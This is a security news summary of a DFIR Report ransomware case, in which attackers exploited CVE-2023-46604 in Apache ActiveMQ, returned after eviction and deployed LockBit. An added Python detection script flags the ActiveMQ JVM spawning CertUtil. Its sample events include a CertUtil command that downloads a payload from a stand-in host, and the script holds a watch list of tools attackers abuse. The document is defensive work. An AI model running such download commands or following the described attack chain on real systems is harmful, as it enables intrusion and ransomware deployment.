Apache ActiveMQ CVE-2023-46604 Exploited in LockBit Ransomware Attack Chain
The DFIR Report details an intrusion where threat actors exploited CVE-2023-46604 in Apache ActiveMQ to deploy LockBit ransomware, returning 18 days after initial eviction.

The DFIR Report has published a detailed analysis of a ransomware intrusion that began in February 2024, where a threat actor exploited CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ, to ultimately deploy LockBit ransomware. The attack chain highlights the persistence of adversaries and the critical importance of patching internet-facing vulnerabilities.
The intrusion started when the attacker used a Java Spring class and a custom XML bean configuration file to achieve remote code execution on an exposed Apache ActiveMQ server. The malicious XML contained a command that downloaded a Metasploit stager from a remote server using the Windows CertUtil utility. Within 40 minutes, the attacker escalated privileges to SYSTEM level using the GetSystem command and accessed LSASS process memory on the beachhead host.
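One detection a defender could apply to the first step above, as an added example written for this summary and not code from The DFIR Report: it parses constructed Sysmon-style process-creation records and flags the ActiveMQ JVM spawning CertUtil as a downloader (or other native tooling); the host names, paths and download URL are invented.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 style records (key="value" pairs per line);
# host names, paths and the download URL are invented for this example.
SAMPLE_EVENTS = [
    'Computer="AMQ-SRV01" Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil -urlcache -split -f http://203.0.113.10/stage.exe C:\\Windows\\Temp\\stage.exe" '
    'ParentImage="C:\\Program Files\\Java\\bin\\java.exe" '
    'ParentCommandLine="java -Dactivemq.home=C:\\apache-activemq org.apache.activemq.console.Main start"',
    'Computer="AMQ-SRV01" Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /c whoami" '
    'ParentImage="C:\\Program Files\\Java\\bin\\java.exe" '
    'ParentCommandLine="java -Dactivemq.home=C:\\apache-activemq org.apache.activemq.console.Main start"',
    'Computer="WS-042" Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil -verify C:\\certs\\intermediate.cer" '
    'ParentImage="C:\\Windows\\explorer.exe" ParentCommandLine="explorer.exe"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
# Native tools a message broker has no business launching; CertUtil is the one used here.
WATCHED_CHILDREN = {"certutil.exe", "cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe"}

def parse_event(line: str) -> Dict[str, str]:
    return dict(FIELD_RE.findall(line))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def spawned_by_activemq(ev: Dict[str, str]) -> bool:
    """Parent is the broker's JVM: java.exe whose command line references ActiveMQ."""
    return (basename(ev.get("ParentImage", "")) == "java.exe"
            and "activemq" in ev.get("ParentCommandLine", "").lower())

def is_certutil_download(ev: Dict[str, str]) -> bool:
    """CertUtil used as a downloader (-urlcache with a URL), as in the intrusion above."""
    cl = ev.get("CommandLine", "").lower()
    return basename(ev.get("Image", "")) == "certutil.exe" and "-urlcache" in cl and "http" in cl

def assess(line: str) -> str:
    """Severity for one event: 'high', 'medium', 'low' or 'none'."""
    ev = parse_event(line)
    if spawned_by_activemq(ev) and basename(ev.get("Image", "")) in WATCHED_CHILDREN:
        return "high" if is_certutil_download(ev) else "medium"
    return "low" if is_certutil_download(ev) else "none"

def triage(lines: List[str]) -> List[tuple]:
    """(computer, severity, command line) for every event that is not 'none'."""
    return [(parse_event(l).get("Computer", "?"), assess(l), parse_event(l).get("CommandLine", ""))
            for l in lines if assess(l) != "none"]
```

Running `triage(SAMPLE_EVENTS)` returns the two broker-spawned events on AMQ-SRV01 and ignores the legitimate `certutil -verify` on the workstation.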
Lateral movement followed, with the attacker using a domain administrator account to execute Metasploit payloads on several remote hosts via remote services. LSASS memory was accessed on multiple systems, including one host that contained a privileged service account later used for re-entry. Despite extensive access, some lateral movement attempts were blocked by active antivirus on targeted hosts.
On the second day, the attacker returned to the beachhead host to run discovery commands, but shortly after, they lost access to the environment. However, 18 days later, the same threat actor exploited the same unpatched Apache ActiveMQ server to regain access. They repeated the initial steps—GetSystem and LSASS access—and then used the previously stolen privileged service account to move laterally to domain controllers and other servers.
Once re-established, the attacker deployed LockBit ransomware. They used RDP to access a backup server and a file server, dropping a batch file and AnyDesk for remote access. After ensuring RDP was enabled, they dropped Advanced IP Scanner and two LockBit ransomware binaries. The ransomware was executed with specific path and password flags, and the deployment continued for approximately four hours.
The DFIR Report notes that while the ransomware binary aligns with LockBit signatures, it was likely crafted using the leaked LockBit builder, as the ransom note was modified and communication relied exclusively on the Session messaging service. The time to ransomware was 419 hours from initial access, but if the organization had only detected the second intrusion, they would have had less than 90 minutes before encryption.
This case underscores the importance of patching known vulnerabilities promptly, as CVE-2023-46604 was disclosed in late 2023 and had available patches. The attacker's ability to return after eviction highlights the need for thorough remediation and monitoring to prevent re-exploitation of the same flaw.